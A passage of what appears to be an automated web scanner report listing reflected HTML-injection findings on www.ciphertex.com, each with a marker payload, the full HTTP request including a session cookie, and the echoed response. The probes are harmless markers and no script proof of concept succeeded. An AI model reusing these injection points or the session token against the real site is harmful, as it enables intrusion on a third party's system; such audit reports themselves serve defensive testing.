<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-modules-fieldgroup-77d66"><a>596ac13dd54" class="section-sites sidebar-none">
...[SNIP]...
2.64. http://www.ciphertex.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee26c"><a>7338ae6f861 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/theme/content-module.cssee26c"><a>7338ae6f861?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:41 GMT
Vary: Accept-Encoding
Content-Length: 10041
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-theme-content-module.cssee26c"><a>7338ae6f861" class="section-sites sidebar-none">
...[SNIP]...
2.65. http://www.ciphertex.com/sites/all/modules/custom_module/ciphertex.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/custom_module/ciphertex.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13980"><a>17c7c4d864f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/custom_module/ciphertex.js13980"><a>17c7c4d864f?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:07 GMT
Vary: Accept-Encoding
Content-Length: 10037
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-custom_module-ciphertex.js13980"><a>17c7c4d864f" class="section-sites sidebar-none">
...[SNIP]...
2.66. http://www.ciphertex.com/sites/all/modules/date/date_popup/themes/jquery.timeentry.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/date/date_popup/themes/jquery.timeentry.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8009"><a>5c6d01fe2e4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/date/d8009"><a>5c6d01fe2e4/themes/jquery.timeentry.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:55 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-date-d8009"><a>5c6d01fe2e4-themes-jquery.timeentry.css" class="section-sites sidebar-none">
...[SNIP]...
2.67. http://www.ciphertex.com/sites/all/modules/filefield/filefield.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac75c"><a>660fd2b4a63 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/filefieldac75c"><a>660fd2b4a63/filefield.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:09 GMT
Vary: Accept-Encoding
Content-Length: 10031
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-filefieldac75c"><a>660fd2b4a63-filefield.css" class="section-sites sidebar-none">
...[SNIP]...
2.68. http://www.ciphertex.com/sites/all/modules/galleria/inc/galleria.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/galleria/inc/galleria.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31b37"><a>f41e3e3235 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites31b37"><a>f41e3e3235/all/modules/galleria/inc/galleria.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:14 GMT
Vary: Accept-Encoding
Content-Length: 10053
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites31b37"><a>f41e3e3235-all-modules-galleria-inc-galleria.css" class="section-sites31b37">
...[SNIP]...
2.69. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/jquery_update/replace/jquery.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6700"><a>633fc2753a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a6700"><a>633fc2753a2/all/modules/jquery_update/replace/jquery.min.js?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:29 GMT
Vary: Accept-Encoding
Content-Length: 10061
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-a6700"><a>633fc2753a2-all-modules-jquery_update-replace-jquery.min.js" class="section-a6700">
...[SNIP]...
2.70. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/jquery_update/replace/jquery.min.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 733fd"><a>90f5d522738 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/jquery_update/replace/jquery.min.js733fd"><a>90f5d522738?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:08 GMT
Vary: Accept-Encoding
Content-Length: 10055
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-jquery_update-replace-jquery.min.js733fd"><a>90f5d522738" class="section-sites sidebar-none">
...[SNIP]...
2.71. http://www.ciphertex.com/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9925"><a>9bfb48c88ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitese9925"><a>9bfb48c88ba/all/modules/logintoboggan/logintoboggan.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:31 GMT
Vary: Accept-Encoding
Content-Length: 10068
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sitese9925"><a>9bfb48c88ba-all-modules-logintoboggan-logintoboggan.css" class="section-sitese9925">
...[SNIP]...
2.72. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58eb2"><a>af294686ceb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /58eb2"><a>af294686ceb/all/modules/print/css/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:25 GMT
Vary: Accept-Encoding
Content-Length: 10039
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-58eb2"><a>af294686ceb-all-modules-print-css-printlinks.css" class="section-58eb2">
...[SNIP]...
2.73. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63f63"><a>93577d2105f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules63f63"><a>93577d2105f/print/css/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:36 GMT
Vary: Accept-Encoding
Content-Length: 10033
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules63f63"><a>93577d2105f-print-css-printlinks.css" class="section-sites sidebar-none">
...[SNIP]...
2.74. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56553"><a>a1c944e5b2e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/print/56553"><a>a1c944e5b2e/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:51 GMT
Vary: Accept-Encoding
Content-Length: 10027
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-print-56553"><a>a1c944e5b2e-printlinks.css" class="section-sites sidebar-none">
...[SNIP]...
2.75. http://www.ciphertex.com/sites/all/modules/tabs/drupal-tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/tabs/drupal-tabs.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94af3"><a>651da2295d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites94af3"><a>651da2295d2/all/modules/tabs/drupal-tabs.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:57 GMT
Vary: Accept-Encoding
Content-Length: 10046
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites94af3"><a>651da2295d2-all-modules-tabs-drupal-tabs.css" class="section-sites94af3">
...[SNIP]...
2.76. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73aab"><a>cc61c204163 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart73aab"><a>cc61c204163/shipping/uc_quote/uc_quote.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:04 GMT
Vary: Accept-Encoding
Content-Length: 10063
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart73aab"><a>cc61c204163-shipping-uc_quote-uc_quote.css" class="section-sites sidebar-none">
...[SNIP]...
2.77. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a5e"><a>6fbabd2ed7f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/shipping/uc_quoteb1a5e"><a>6fbabd2ed7f/uc_quote.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:19 GMT
Vary: Accept-Encoding
Content-Length: 10063
Content-Type: text/html; charset=utf-8

